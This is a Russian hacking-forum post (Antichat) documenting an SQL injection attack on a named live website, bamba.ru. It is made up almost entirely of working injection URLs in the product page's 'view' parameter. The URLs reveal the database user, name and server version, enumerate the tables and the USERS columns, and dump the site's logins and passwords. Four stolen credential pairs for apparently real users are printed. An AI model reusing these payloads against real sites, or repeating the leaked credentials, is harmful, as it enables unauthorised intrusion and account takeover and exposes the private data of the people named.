ANTICHAT - Показать сообщение отдельно

http://www.bamba.ru/product.asp?view=56634+or+1=(select+system_user)

http://www.bamba.ru/product.asp?view=56634+or+1=(select+db_name())

http://www.bamba.ru/product.asp?view=56634+or+1=@@version

bd_user: frontcontent

bd_name:bamba

http://www.bamba.ru/product.asp?view=56634+or+1=@@version

version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

-----------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_5','CONTENT_26','CONTENT_20','SITE','main_catalo g','SYSTEM_VARS','USER_RIGHTS','CONTENT_TYPE','PAG E','ATTRIBUTE_GROUP','ATTRIBUTE_TYPE','BACKEND_SEC TION','catalog','CONTAINER','CONTAINER_TYPE','CONT ENT','CONTENT_1','CONTENT_10','CONTENT_11','CONTEN T_12','CONTENT_13','CONTENT_14','CONTENT_15','CONT ENT_16','CONTENT_17','CONTENT_18','CONTENT_19','CO NTENT_2','CONTENT_21','CONTENT_22','CONTENT_23','C ONTENT_24','CONTENT_3','CONTENT_4','CONTENT_6','CO NTENT_7','CONTENT_8','CONTENT_9','CONTENT_ATTRIBUT E','CONTENT_DATA','CONTENT_LINK','CONTENT_STATUS', 'CONTENT_TYPE_GROUP','CONTENT_TYPE_LINK','DB_VERSI ON','dtproperties','FORMAT','GROUP_ROLE','LANGUAGE ','MEMBER','MEMBER_CONTENT','OBJECT','ROLE','ROLE_ RIGHTS','SITE_LANG','SITE_SECTIONS','sysconstraint s','syssegments','SYSTEM_VARS_GROUP','t_jiaozhu',' TEMPLATE','UNIT','UNIT_SETTING','USER_GROUP','USER _ROLE'))

получаем таблицу 'USERS'
--------------------------------------
Получаем структуру таблицы users

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+column_n ame+from+information_schema.columns+where+table_na me='USERS'+and+column_name+not+in+('created','disa bled','full_name','login','modified','password','site_id'))

---------------------------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users)--

login:MNBorisow
password:ma3569

-------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow') )--

login

VStebunov
pass:12345678

----------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov'))--

login:yy
pass:moscow1

------------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov','yy'))--

login:GLazukin
pass:GP97sl

И.Т.Д.